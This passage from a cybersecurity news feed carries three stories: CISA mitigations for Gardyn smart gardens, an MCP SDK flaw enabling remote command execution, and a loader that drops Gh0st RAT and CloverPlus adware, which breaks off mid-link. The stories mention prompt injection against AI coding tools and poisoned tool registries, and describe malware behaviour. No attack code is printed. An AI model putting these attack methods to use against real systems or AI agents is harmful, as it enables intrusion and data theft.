<li>Gardyn Cloud API versions prior to 2.12.2026 (linked to multiple recent flaws, including CVE-2026-28766, CVE-2026-25197, CVE-2026-32646, CVE-2026-28767, and CVE-2026-32662).</li>
</ul>



<p>While CISA notes that there is currently no evidence of these specific vulnerabilities being actively exploited in the wild, the high CVSS score <span style="box-sizing: border-box; margin: 0px; padding: 0px;">makes<a href="https://cybersecuritynews.com/patching-vulnerabilities-faster-reduces-risks/" target="_blank"> immediate</a></span><a href="https://cybersecuritynews.com/patching-vulnerabilities-faster-reduces-risks/" target="_blank" rel="noreferrer noopener"> patching critical to prevent future attacks</a>.</p>



<h2 class="wp-block-heading" id="h-cisa-recommended-defensive-measures"><strong>CISA Recommended Defensive Measures</strong></h2>



<p>To protect against potential remote takeovers, <a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-055-03" target="_blank" rel="noreferrer noopener nofollow">CISA strongly urges organizations</a> and individual users to apply defensive strategies immediately.</p>



<p><strong>Recommended mitigation actions include:</strong></p>



<ul class="wp-block-list">
<li>Minimize network exposure by ensuring smart garden control devices are never directly accessible from the public internet.</li>



<li>Place control system networks and remote devices securely behind firewalls, isolating them entirely from standard business or home networks.</li>



<li>Use secure methods, such as <a href="https://cybersecuritynews.com/virtual-private-networks-vpns-in-cybersecurity-a-comprehensive-overview/" target="_blank" rel="noreferrer noopener">updated Virtual Private Networks (VPNs)</a>, if remote access is absolutely required, keeping in mind that a VPN is only as secure as the devices it connects to.</li>



<li>Perform a thorough impact analysis and risk assessment before deploying new defensive measures to avoid disrupting operations.</li>
</ul>



<p>Users are advised to immediately update their mobile applications and cloud API integrations to the latest available versions to secure their smart gardening infrastructure against these critical remote threats.</p>



<p class="has-text-align-center has-background" style="background:linear-gradient(180deg,rgb(238,238,238) 94%,rgb(169,184,195) 100%)"><strong>Follow us on <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en" target="_blank" rel="noreferrer noopener nofollow">Google News</a>, <a href="https://www.linkedin.com/company/cybersecurity-news/" target="_blank" rel="noreferrer noopener nofollow">LinkedIn</a>, and <a href="https://x.com/cyber_press_org" target="_blank" rel="noreferrer noopener nofollow">X</a> for daily cybersecurity updates. <a href="https://cybersecuritynews.com/contact-us/" target="_blank" rel="noreferrer noopener nofollow">Contact us</a> to feature your stories.</strong></p>
<p>The post <a href="https://cybersecuritynews.com/gardyn-smart-gardens-vulnerabilities/">Critical Gardyn Smart Gardens Vulnerabilities Let Attackers Control Devices Remotely</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></content:encoded>
					
		
		
		<media:content url="https://cybersecuritynews.com/wp-content/uploads/2026/04/Critical-Gardyn-Smart-Gardens-vulnerabilities-Let-Attackers-Control-Devices-Remotely.webp" medium="image"></media:content>
            <post-id xmlns="com-wordpress:feed-additions:1">147871</post-id>	</item>
		<item>
		<title>Critical Anthropic’s MCP Vulnerability Enables Remote Code Execution Attacks</title>
		<link>https://cybersecuritynews.com/anthropics-mcp-vulnerability/</link>
		
		<dc:creator><![CDATA[Abinaya]]></dc:creator>
		<pubDate>Tue, 21 Apr 2026 02:37:35 +0000</pubDate>
				<category><![CDATA[AI]]></category>
		<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[Vulnerability News]]></category>
		<category><![CDATA[cyber security]]></category>
		<category><![CDATA[cyber security news]]></category>
		<guid isPermaLink="false">https://cybersecuritynews.com/?p=147934</guid>

					<description><![CDATA[<p>A critical flaw in Anthropic’s Model Context Protocol (MCP) exposes over 150 million downloads to potential compromise. The vulnerability could enable full system takeover across up to 200,000 servers. The OX Security Research team identified the flaw as a fundamental design decision embedded in Anthropic&#8217;s official MCP SDKs across every supported programming language, including Python, TypeScript, [&#8230;]</p>
<p>The post <a href="https://cybersecuritynews.com/anthropics-mcp-vulnerability/">Critical Anthropic’s MCP Vulnerability Enables Remote Code Execution Attacks</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A critical flaw in <span style="box-sizing: border-box; margin: 0px; padding: 0px;">Anthropic’s<a href="https://cybersecuritynews.com/security-for-the-model-context-protocol-mcp-frameworks-mitigation-strategies-and-vulnerabilities-database/" target="_blank"> Model</a></span><a href="https://cybersecuritynews.com/security-for-the-model-context-protocol-mcp-frameworks-mitigation-strategies-and-vulnerabilities-database/" target="_blank" rel="noreferrer noopener"> Context Protocol (MCP) exposes</a> over 150 million downloads to potential compromise. The vulnerability could enable full system takeover across up to 200,000 servers.</p>



<p>The OX Security Research team identified the flaw as a fundamental design decision embedded in Anthropic&#8217;s official MCP SDKs across every supported programming language, including Python, TypeScript, Java, and Rust.</p>



<p>Unlike a traditional coding bug, this vulnerability is architectural, meaning any developer building on Anthropic&#8217;s MCP foundation unknowingly inherits the exposure from the ground up.</p>



<p>The flaw enables <a href="https://cybersecuritynews.com/flowise-vulnerability/" target="_blank" rel="noreferrer noopener">Arbitrary Command Execution (RCE) on any system</a> running a vulnerable MCP implementation.</p>



<p>Successful exploitation grants attackers direct access to sensitive user data, internal databases, API keys, and chat histories, effectively handing over complete control of the affected environment.</p>



<p><strong>Researchers identified four distinct exploitation families:</strong></p>



<ul class="wp-block-list">
<li>Unauthenticated UI Injection targeting popular AI frameworks.</li>



<li>Hardening Bypasses in supposedly protected environments like Flowise.</li>



<li>Zero-Click Prompt Injection in AI IDEs, including Windsurf and Cursor.</li>



<li>Malicious Marketplace Distribution, with 9 out of 11 MCP registries successfully poisoned with a malicious test payload.</li>
</ul>



<p>OX Security confirmed successful command execution on six live production platforms, including critical <a href="https://cybersecuritynews.com/48-ai-vulnerabilities-220-percent/" target="_blank" rel="noreferrer noopener">vulnerabilities in LiteLLM, LangChain, and IBM&#8217;s LangFlow.</a></p>



<p>The research produced at least 10 CVEs spanning multiple high-profile projects. Several critical flaws have been patched, including CVE-2026-30623 in LiteLLM and CVE-2026-33224 in Bisheng.</p>



<figure class="wp-block-image size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYzkFtYEoYB2w5fGohKFBhAZli2oz-MtF17FAS5Gvp6W1oF9Hh5T5PbgYWvkpyJAsSO99TEPQBzG3UZvRozFyFU4Anka8iz4GnG_G_KyApUKSOdfYLTIdNp3xwwyPEwD_7Q3u7Em1wp1_bfPLMDnVmHGsbhn2GhhgOoq6MBlEYwSu9v1ploAjuty-4pBE/s1600/Screenshot%202026-04-20%20185952%20%281%29.webp" alt="MCP Disclosure Timeline (Source: OX Security)"/><figcaption class="wp-element-caption"><em>MCP Disclosure Timeline (Source: OX Security)</em></figcaption></figure>



<p>In contrast, others remain unpatched and in a &#8220;reported&#8221; state, covering tools like GPT Researcher, Agent Zero, Windsurf, and DocsGPT.</p>



<p><a href="https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp/" target="_blank" rel="noreferrer noopener nofollow">OX Security repeatedly recommended to Anthropic a protocol-level patch </a>that would have immediately protected millions of downstream users.</p>



<p>Anthropic declined, describing the behavior as &#8220;expected.&#8221; The company did not object when researchers notified them of their intent to publish.</p>



<p>This response comes just days <span style="box-sizing: border-box; margin: 0px; padding: 0px;">after<a href="https://cybersecuritynews.com/anthropic-claude-mythos/" target="_blank"> Anthropic</a></span><a href="https://cybersecuritynews.com/anthropic-claude-mythos/" target="_blank" rel="noreferrer noopener"> unveiled Claude Mythos</a>, positioned as a tool to help secure the world&#8217;s software, a contrast researchers describe as a call to action for Anthropic to apply &#8220;Secure by Design&#8221; principles to its own infrastructure first.</p>



<h2 class="wp-block-heading" id="h-how-to-protect-your-environment"><strong>How to Protect Your Environment</strong></h2>



<ul class="wp-block-list">
<li>Block public internet access to AI services connected to sensitive APIs or databases.</li>



<li>Treat all external MCP configuration input as untrusted; block or restrict user-controlled inputs to STDIO parameters.</li>



<li>Install MCP servers only from verified sources such as <a href="https://github.com/mcp" target="_blank" rel="noreferrer noopener nofollow">the official GitHub MCP Registry</a>.</li>



<li>Run MCP-enabled services inside sandboxes with restricted permissions.</li>



<li>Monitor all tool invocations for unexpected background activity or data exfiltration attempts.</li>



<li>Update all affected services to their latest patched versions immediately.</li>
</ul>



<p>OX Security has shipped platform-level detections to identify unsafe STDIO MCP configurations in customer codebases and AI-generated code.</p>



<p class="has-text-align-center has-background" style="background:linear-gradient(180deg,rgb(238,238,238) 94%,rgb(169,184,195) 100%)"><strong>Follow us on <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en" target="_blank" rel="noreferrer noopener nofollow">Google News</a>, <a href="https://www.linkedin.com/company/cybersecurity-news/" target="_blank" rel="noreferrer noopener nofollow">LinkedIn</a>, and <a href="https://x.com/cyber_press_org" target="_blank" rel="noreferrer noopener nofollow">X</a> for daily cybersecurity updates. <a href="https://cybersecuritynews.com/contact-us/" target="_blank" rel="noreferrer noopener nofollow">Contact us</a> to feature your stories.</strong></p>
<p>The post <a href="https://cybersecuritynews.com/anthropics-mcp-vulnerability/">Critical Anthropic’s MCP Vulnerability Enables Remote Code Execution Attacks</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></content:encoded>
					
		
		
		<media:content url="https://cybersecuritynews.com/wp-content/uploads/2026/04/Critical-Anthropics-MCP-Vulnerability-Enables-Remote-Code-Execution-Attacks.webp" medium="image"></media:content>
            <post-id xmlns="com-wordpress:feed-additions:1">147934</post-id>	</item>
		<item>
		<title>Gh0st RAT and CloverPlus Adware Delivered Together in New Dual-Payload Malware Campaign</title>
		<link>https://cybersecuritynews.com/gh0st-rat-and-cloverplus-adware-delivered-together/</link>
		
		<dc:creator><![CDATA[Tushar Subhra Dutta]]></dc:creator>
		<pubDate>Mon, 20 Apr 2026 20:39:59 +0000</pubDate>
				<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[Threats]]></category>
		<category><![CDATA[cyber security]]></category>
		<category><![CDATA[cyber security news]]></category>
		<guid isPermaLink="false">https://cybersecuritynews.com/?p=147986</guid>

					<description><![CDATA[<p>A newly identified malware campaign is raising serious concerns across the cybersecurity community by delivering two very different threats at the same time. Attackers are now using a single, obfuscated loader to push both Gh0st Remote Access Trojan (RAT) and CloverPlus adware onto the same victim machine, giving them both long-term system control and an [&#8230;]</p>
<p>The post <a href="https://cybersecuritynews.com/gh0st-rat-and-cloverplus-adware-delivered-together/">Gh0st RAT and CloverPlus Adware Delivered Together in New Dual-Payload Malware Campaign</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A newly identified malware campaign is raising serious concerns across the cybersecurity community by delivering two very different threats at the same time. </p>



<p>Attackers are now using a single, obfuscated loader to push both Gh0st Remote Access Trojan (RAT) and CloverPlus adware onto the same victim machine, giving them both long-term system control and an immediate way to profit from the attack.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/587b9e72-6585-4ab6-87df-1ef83d103e98/Gh0st-RAT-and-CloverPlus-Adware-Delivered-Together-in-New-Dual-Payload-Malware-Campaign.pdf?AWSAccessKeyId=ASIA2F3EMEYEZ75QI5BS&amp;Signature=ycoWgRO6Bv0M9e9XZo0JO87RirI%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFwaCXVzLWVhc3QtMSJHMEUCIQD3Qdz7cweEbPPBr1wyfouBfsASr0IMjsPSwj4ho2OlIQIgDnb7NjPvfaE96WAkOLpzyzMBtlvCCQWL8JwwH%2FNrzW0q8wQIJBABGgw2OTk3NTMzMDk3MDUiDBPWBiHYVO%2FswM4rNirQBEgPRgyWuIk15Q%2FBybr73WQkF23GfEY42f%2F7cdHnyCAk97gEzgQV9o8sfsvbF5PJcj2PdHFQaWg3%2FFnDqszm2HFNyjvFWo8f%2BSRk%2FPIG%2BrycivqWOj22wq8V3%2FYLjSwaV3doRfarHtbQBuNX8Gb9CTXIHQuyBxc16XDquURNKaMzuj5bjz%2Fv20PBcHbGrDSNchvnhCV9cSRGA1lbHL2Qcr0ntJCVZRWYU%2BLIwNGuPeNnQ1In%2FFwQUIGlyGV4hHynx1NBesZRUAQ2XMSc7viQCHrFbmHXJrcOY7GZxI2zrOlNxkj2vu%2BAe7Z4orHG1WllA1Yyv73dkxcslCmvXde3WB6dmwnYxtHt%2BtlcUwGwbTa1LAxqIBUlWXtujygmRKC1xS4SZ%2Bh33F6B4q9VqT1AJkBLGgEFx5J9WxJ3q2xc8unNoCml07iQ9cqhtzJjUnjatCvLz%2F7IJhkTshnVanV7sCkU5NjQF%2Bp2gqhvgWwhOY7Nk1O5l9hdzolnQL22A3eTS11S9oOh6rVVgw1swvGpQXJEfrzcChcdyqA4IxsKyGRSrd7m9Jwb5626E7nbjK6SxcccSCqd5olhztIAjV8li3O3aWtfuN11wZG2iDKZMGZH%2BuaqoujnmjBA5hruEtl%2FXJXWxhzUycpbDeJINjGhb36LpTlr6HatmPN8hSSAgPxA2hVQBjSYhRQ23unZCxChqQv1ih6MOsrG1IZGglk0HsK4jXmhV2M3AKyFif40K6AVjD6CO4o1W0ICMpMF1LZQcmi4t79Ft9myXoZ%2BQjuIOJkwifeZzwY6mAEmTgZFP%2B%2F7T8gtxarLSuSDFuvBQWcPGeA1S9grdvh62wnvDNPejtlCHbgbv0mCrh76RxjxZXgKsKtatJsZmJs2AFfJhtRubj7UmpWG8ASvy0ETfd7RK10YfWd%2FpNiXPiQTjXpSfx6pZPKi7%2Beh0UpaflCzPRluZSrR9awfIwpuLFGsTwN7WzBpPaZPtgqH3wy0MgYyPccHTw%3D%3D&amp;Expires=1776714495" target="_blank" rel="noreferrer noopener"></a></p>



<p>This pairing is unusual but strategic. Gh0st RAT is a well-known tool that gives attackers full control over a compromised system, while CloverPlus adware is designed to change browser behavior, install unwanted advertising components, and generate pop-up ads for financial gain. </p>



<p>Together, the two threats allow the attacker to maintain a backdoor for ongoing access while also monetizing the infected machine in real time. </p>



<p>The campaign represents a clear shift toward multi-payload delivery strategies that maximize the return from a single infection.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/587b9e72-6585-4ab6-87df-1ef83d103e98/Gh0st-RAT-and-CloverPlus-Adware-Delivered-Together-in-New-Dual-Payload-Malware-Campaign.pdf?AWSAccessKeyId=ASIA2F3EMEYEZ75QI5BS&amp;Signature=ycoWgRO6Bv0M9e9XZo0JO87RirI%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFwaCXVzLWVhc3QtMSJHMEUCIQD3Qdz7cweEbPPBr1wyfouBfsASr0IMjsPSwj4ho2OlIQIgDnb7NjPvfaE96WAkOLpzyzMBtlvCCQWL8JwwH%2FNrzW0q8wQIJBABGgw2OTk3NTMzMDk3MDUiDBPWBiHYVO%2FswM4rNirQBEgPRgyWuIk15Q%2FBybr73WQkF23GfEY42f%2F7cdHnyCAk97gEzgQV9o8sfsvbF5PJcj2PdHFQaWg3%2FFnDqszm2HFNyjvFWo8f%2BSRk%2FPIG%2BrycivqWOj22wq8V3%2FYLjSwaV3doRfarHtbQBuNX8Gb9CTXIHQuyBxc16XDquURNKaMzuj5bjz%2Fv20PBcHbGrDSNchvnhCV9cSRGA1lbHL2Qcr0ntJCVZRWYU%2BLIwNGuPeNnQ1In%2FFwQUIGlyGV4hHynx1NBesZRUAQ2XMSc7viQCHrFbmHXJrcOY7GZxI2zrOlNxkj2vu%2BAe7Z4orHG1WllA1Yyv73dkxcslCmvXde3WB6dmwnYxtHt%2BtlcUwGwbTa1LAxqIBUlWXtujygmRKC1xS4SZ%2Bh33F6B4q9VqT1AJkBLGgEFx5J9WxJ3q2xc8unNoCml07iQ9cqhtzJjUnjatCvLz%2F7IJhkTshnVanV7sCkU5NjQF%2Bp2gqhvgWwhOY7Nk1O5l9hdzolnQL22A3eTS11S9oOh6rVVgw1swvGpQXJEfrzcChcdyqA4IxsKyGRSrd7m9Jwb5626E7nbjK6SxcccSCqd5olhztIAjV8li3O3aWtfuN11wZG2iDKZMGZH%2BuaqoujnmjBA5hruEtl%2FXJXWxhzUycpbDeJINjGhb36LpTlr6HatmPN8hSSAgPxA2hVQBjSYhRQ23unZCxChqQv1ih6MOsrG1IZGglk0HsK4jXmhV2M3AKyFif40K6AVjD6CO4o1W0ICMpMF1LZQcmi4t79Ft9myXoZ%2BQjuIOJkwifeZzwY6mAEmTgZFP%2B%2F7T8gtxarLSuSDFuvBQWcPGeA1S9grdvh62wnvDNPejtlCHbgbv0mCrh76RxjxZXgKsKtatJsZmJs2AFfJhtRubj7UmpWG8ASvy0ETfd7RK10YfWd%2FpNiXPiQTjXpSfx6pZPKi7%2Beh0UpaflCzPRluZSrR9awfIwpuLFGsTwN7WzBpPaZPtgqH3wy0MgYyPccHTw%3D%3D&amp;Expires=1776714495" target="_blank" rel="noreferrer noopener"></a></p>



<p><a href="https://www.splunk.com/en_us/blog/security/detecting-ghost-rat-cloverplus-adware-loader-analysis.html" id="https://www.splunk.com/en_us/blog/security/detecting-ghost-rat-cloverplus-adware-loader-analysis.html" target="_blank" rel="noreferrer noopener nofollow">Researchers at the Splunk Threat Research Team (STRT) identified this specific loader</a> after observing its behavior across compromised hosts. </p>



<p>The team noted that the loader uses obfuscation techniques to hide both encrypted payloads inside its resource section, making it harder for traditional <a href="https://cybersecuritynews.com/aws-security-tools/" id="6025" target="_blank" rel="noreferrer noopener">security tools</a> to detect. </p>



<p>The research team mapped the malware&#8217;s full behavior against the MITRE ATT&amp;CK framework to document every tactic and technique used during execution.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/587b9e72-6585-4ab6-87df-1ef83d103e98/Gh0st-RAT-and-CloverPlus-Adware-Delivered-Together-in-New-Dual-Payload-Malware-Campaign.pdf?AWSAccessKeyId=ASIA2F3EMEYEZ75QI5BS&amp;Signature=ycoWgRO6Bv0M9e9XZo0JO87RirI%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFwaCXVzLWVhc3QtMSJHMEUCIQD3Qdz7cweEbPPBr1wyfouBfsASr0IMjsPSwj4ho2OlIQIgDnb7NjPvfaE96WAkOLpzyzMBtlvCCQWL8JwwH%2FNrzW0q8wQIJBABGgw2OTk3NTMzMDk3MDUiDBPWBiHYVO%2FswM4rNirQBEgPRgyWuIk15Q%2FBybr73WQkF23GfEY42f%2F7cdHnyCAk97gEzgQV9o8sfsvbF5PJcj2PdHFQaWg3%2FFnDqszm2HFNyjvFWo8f%2BSRk%2FPIG%2BrycivqWOj22wq8V3%2FYLjSwaV3doRfarHtbQBuNX8Gb9CTXIHQuyBxc16XDquURNKaMzuj5bjz%2Fv20PBcHbGrDSNchvnhCV9cSRGA1lbHL2Qcr0ntJCVZRWYU%2BLIwNGuPeNnQ1In%2FFwQUIGlyGV4hHynx1NBesZRUAQ2XMSc7viQCHrFbmHXJrcOY7GZxI2zrOlNxkj2vu%2BAe7Z4orHG1WllA1Yyv73dkxcslCmvXde3WB6dmwnYxtHt%2BtlcUwGwbTa1LAxqIBUlWXtujygmRKC1xS4SZ%2Bh33F6B4q9VqT1AJkBLGgEFx5J9WxJ3q2xc8unNoCml07iQ9cqhtzJjUnjatCvLz%2F7IJhkTshnVanV7sCkU5NjQF%2Bp2gqhvgWwhOY7Nk1O5l9hdzolnQL22A3eTS11S9oOh6rVVgw1swvGpQXJEfrzcChcdyqA4IxsKyGRSrd7m9Jwb5626E7nbjK6SxcccSCqd5olhztIAjV8li3O3aWtfuN11wZG2iDKZMGZH%2BuaqoujnmjBA5hruEtl%2FXJXWxhzUycpbDeJINjGhb36LpTlr6HatmPN8hSSAgPxA2hVQBjSYhRQ23unZCxChqQv1ih6MOsrG1IZGglk0HsK4jXmhV2M3AKyFif40K6AVjD6CO4o1W0ICMpMF1LZQcmi4t79Ft9myXoZ%2BQjuIOJkwifeZzwY6mAEmTgZFP%2B%2F7T8gtxarLSuSDFuvBQWcPGeA1S9grdvh62wnvDNPejtlCHbgbv0mCrh76RxjxZXgKsKtatJsZmJs2AFfJhtRubj7UmpWG8ASvy0ETfd7RK10YfWd%2FpNiXPiQTjXpSfx6pZPKi7%2Beh0UpaflCzPRluZSrR9awfIwpuLFGsTwN7WzBpPaZPtgqH3wy0MgYyPccHTw%3D%3D&amp;Expires=1776714495" target="_blank" rel="noreferrer noopener"></a></p>



<p>The campaign&#8217;s reach and design show that threat actors are becoming more efficient in how they deploy malware. Rather than targeting victims with a single-purpose tool, this loader delivers a package that covers both data theft and ad fraud simultaneously. </p>



<p>Security teams around the world are being urged to review their endpoint monitoring capabilities and update detection rules to account for this kind of bundled attack.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/587b9e72-6585-4ab6-87df-1ef83d103e98/Gh0st-RAT-and-CloverPlus-Adware-Delivered-Together-in-New-Dual-Payload-Malware-Campaign.pdf?AWSAccessKeyId=ASIA2F3EMEYEZ75QI5BS&amp;Signature=ycoWgRO6Bv0M9e9XZo0JO87RirI%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFwaCXVzLWVhc3QtMSJHMEUCIQD3Qdz7cweEbPPBr1wyfouBfsASr0IMjsPSwj4ho2OlIQIgDnb7NjPvfaE96WAkOLpzyzMBtlvCCQWL8JwwH%2FNrzW0q8wQIJBABGgw2OTk3NTMzMDk3MDUiDBPWBiHYVO%2FswM4rNirQBEgPRgyWuIk15Q%2FBybr73WQkF23GfEY42f%2F7cdHnyCAk97gEzgQV9o8sfsvbF5PJcj2PdHFQaWg3%2FFnDqszm2HFNyjvFWo8f%2BSRk%2FPIG%2BrycivqWOj22wq8V3%2FYLjSwaV3doRfarHtbQBuNX8Gb9CTXIHQuyBxc16XDquURNKaMzuj5bjz%2Fv20PBcHbGrDSNchvnhCV9cSRGA1lbHL2Qcr0ntJCVZRWYU%2BLIwNGuPeNnQ1In%2FFwQUIGlyGV4hHynx1NBesZRUAQ2XMSc7viQCHrFbmHXJrcOY7GZxI2zrOlNxkj2vu%2BAe7Z4orHG1WllA1Yyv73dkxcslCmvXde3WB6dmwnYxtHt%2BtlcUwGwbTa1LAxqIBUlWXtujygmRKC1xS4SZ%2Bh33F6B4q9VqT1AJkBLGgEFx5J9WxJ3q2xc8unNoCml07iQ9cqhtzJjUnjatCvLz%2F7IJhkTshnVanV7sCkU5NjQF%2Bp2gqhvgWwhOY7Nk1O5l9hdzolnQL22A3eTS11S9oOh6rVVgw1swvGpQXJEfrzcChcdyqA4IxsKyGRSrd7m9Jwb5626E7nbjK6SxcccSCqd5olhztIAjV8li3O3aWtfuN11wZG2iDKZMGZH%2BuaqoujnmjBA5hruEtl%2FXJXWxhzUycpbDeJINjGhb36LpTlr6HatmPN8hSSAgPxA2hVQBjSYhRQ23unZCxChqQv1ih6MOsrG1IZGglk0HsK4jXmhV2M3AKyFif40K6AVjD6CO4o1W0ICMpMF1LZQcmi4t79Ft9myXoZ%2BQjuIOJkwifeZzwY6mAEmTgZFP%2B%2F7T8gtxarLSuSDFuvBQWcPGeA1S9grdvh62wnvDNPejtlCHbgbv0mCrh76RxjxZXgKsKtatJsZmJs2AFfJhtRubj7UmpWG8ASvy0ETfd7RK10YfWd%2FpNiXPiQTjXpSfx6pZPKi7%2Beh0UpaflCzPRluZSrR9awfIwpuLFGsTwN7WzBpPaZPtgqH3wy0MgYyPccHTw%3D%3D&amp;Expires=1776714495" target="_blank" rel="noreferrer noopener"></a></p>



<p>The impact of this campaign is significant for both individuals and organizations. The adware component can disrupt browser functionality and expose users to <a href="https://cybersecuritynews.com/detecting-malicious-javascript-using-behavior-analysis-and-network-traces/" id="100693" target="_blank" rel="noreferrer noopener">malicious advertisements</a>, while the RAT payload can steal sensitive data, capture keystrokes, block access to security websites, and give attackers persistent, privileged access to the infected system.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/587b9e72-6585-4ab6-87df-1ef83d103e98/Gh0st-RAT-and-CloverPlus-Adware-Delivered-Together-in-New-Dual-Payload-Malware-Campaign.pdf?AWSAccessKeyId=ASIA2F3EMEYEZ75QI5BS&amp;Signature=ycoWgRO6Bv0M9e9XZo0JO87RirI%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFwaCXVzLWVhc3QtMSJHMEUCIQD3Qdz7cweEbPPBr1wyfouBfsASr0IMjsPSwj4ho2OlIQIgDnb7NjPvfaE96WAkOLpzyzMBtlvCCQWL8JwwH%2FNrzW0q8wQIJBABGgw2OTk3NTMzMDk3MDUiDBPWBiHYVO%2FswM4rNirQBEgPRgyWuIk15Q%2FBybr73WQkF23GfEY42f%2F7cdHnyCAk97gEzgQV9o8sfsvbF5PJcj2PdHFQaWg3%2FFnDqszm2HFNyjvFWo8f%2BSRk%2FPIG%2BrycivqWOj22wq8V3%2FYLjSwaV3doRfarHtbQBuNX8Gb9CTXIHQuyBxc16XDquURNKaMzuj5bjz%2Fv20PBcHbGrDSNchvnhCV9cSRGA1lbHL2Qcr0ntJCVZRWYU%2BLIwNGuPeNnQ1In%2FFwQUIGlyGV4hHynx1NBesZRUAQ2XMSc7viQCHrFbmHXJrcOY7GZxI2zrOlNxkj2vu%2BAe7Z4orHG1WllA1Yyv73dkxcslCmvXde3WB6dmwnYxtHt%2BtlcUwGwbTa1LAxqIBUlWXtujygmRKC1xS4SZ%2Bh33F6B4q9VqT1AJkBLGgEFx5J9WxJ3q2xc8unNoCml07iQ9cqhtzJjUnjatCvLz%2F7IJhkTshnVanV7sCkU5NjQF%2Bp2gqhvgWwhOY7Nk1O5l9hdzolnQL22A3eTS11S9oOh6rVVgw1swvGpQXJEfrzcChcdyqA4IxsKyGRSrd7m9Jwb5626E7nbjK6SxcccSCqd5olhztIAjV8li3O3aWtfuN11wZG2iDKZMGZH%2BuaqoujnmjBA5hruEtl%2FXJXWxhzUycpbDeJINjGhb36LpTlr6HatmPN8hSSAgPxA2hVQBjSYhRQ23unZCxChqQv1ih6MOsrG1IZGglk0HsK4jXmhV2M3AKyFif40K6AVjD6CO4o1W0ICMpMF1LZQcmi4t79Ft9myXoZ%2BQjuIOJkwifeZzwY6mAEmTgZFP%2B%2F7T8gtxarLSuSDFuvBQWcPGeA1S9grdvh62wnvDNPejtlCHbgbv0mCrh76RxjxZXgKsKtatJsZmJs2AFfJhtRubj7UmpWG8ASvy0ETfd7RK10YfWd%2FpNiXPiQTjXpSfx6pZPKi7%2Beh0UpaflCzPRluZSrR9awfIwpuLFGsTwN7WzBpPaZPtgqH3wy0MgYyPccHTw%3D%3D&amp;Expires=1776714495" target="_blank" rel="noreferrer noopener"></a></p>



<h2 class="wp-block-heading" id="inside-the-loader-how-both-payloads-are-dropped-an"><strong>Inside the Loader: How Both Payloads Are Dropped and Executed</strong></h2>



<p>The loader at the center of this campaign is built to be stealthy from the very beginning. It hides two encrypted payloads inside its resource section, and the first to be released is the CloverPlus adware module, identified as AdWare.Win32.CloverPlus. </p>



<p>This component is tied to an executable named wiseman.exe, as shown in Figure 01: The Adware Payload, and is responsible for modifying browser startup pages and injecting pop-up advertisements.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/587b9e72-6585-4ab6-87df-1ef83d103e98/Gh0st-RAT-and-CloverPlus-Adware-Delivered-Together-in-New-Dual-Payload-Malware-Campaign.pdf?AWSAccessKeyId=ASIA2F3EMEYEZ75QI5BS&amp;Signature=ycoWgRO6Bv0M9e9XZo0JO87RirI%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFwaCXVzLWVhc3QtMSJHMEUCIQD3Qdz7cweEbPPBr1wyfouBfsASr0IMjsPSwj4ho2OlIQIgDnb7NjPvfaE96WAkOLpzyzMBtlvCCQWL8JwwH%2FNrzW0q8wQIJBABGgw2OTk3NTMzMDk3MDUiDBPWBiHYVO%2FswM4rNirQBEgPRgyWuIk15Q%2FBybr73WQkF23GfEY42f%2F7cdHnyCAk97gEzgQV9o8sfsvbF5PJcj2PdHFQaWg3%2FFnDqszm2HFNyjvFWo8f%2BSRk%2FPIG%2BrycivqWOj22wq8V3%2FYLjSwaV3doRfarHtbQBuNX8Gb9CTXIHQuyBxc16XDquURNKaMzuj5bjz%2Fv20PBcHbGrDSNchvnhCV9cSRGA1lbHL2Qcr0ntJCVZRWYU%2BLIwNGuPeNnQ1In%2FFwQUIGlyGV4hHynx1NBesZRUAQ2XMSc7viQCHrFbmHXJrcOY7GZxI2zrOlNxkj2vu%2BAe7Z4orHG1WllA1Yyv73dkxcslCmvXde3WB6dmwnYxtHt%2BtlcUwGwbTa1LAxqIBUlWXtujygmRKC1xS4SZ%2Bh33F6B4q9VqT1AJkBLGgEFx5J9WxJ3q2xc8unNoCml07iQ9cqhtzJjUnjatCvLz%2F7IJhkTshnVanV7sCkU5NjQF%2Bp2gqhvgWwhOY7Nk1O5l9hdzolnQL22A3eTS11S9oOh6rVVgw1swvGpQXJEfrzcChcdyqA4IxsKyGRSrd7m9Jwb5626E7nbjK6SxcccSCqd5olhztIAjV8li3O3aWtfuN11wZG2iDKZMGZH%2BuaqoujnmjBA5hruEtl%2FXJXWxhzUycpbDeJINjGhb36LpTlr6HatmPN8hSSAgPxA2hVQBjSYhRQ23unZCxChqQv1ih6MOsrG1IZGglk0HsK4jXmhV2M3AKyFif40K6AVjD6CO4o1W0ICMpMF1LZQcmi4t79Ft9myXoZ%2BQjuIOJkwifeZzwY6mAEmTgZFP%2B%2F7T8gtxarL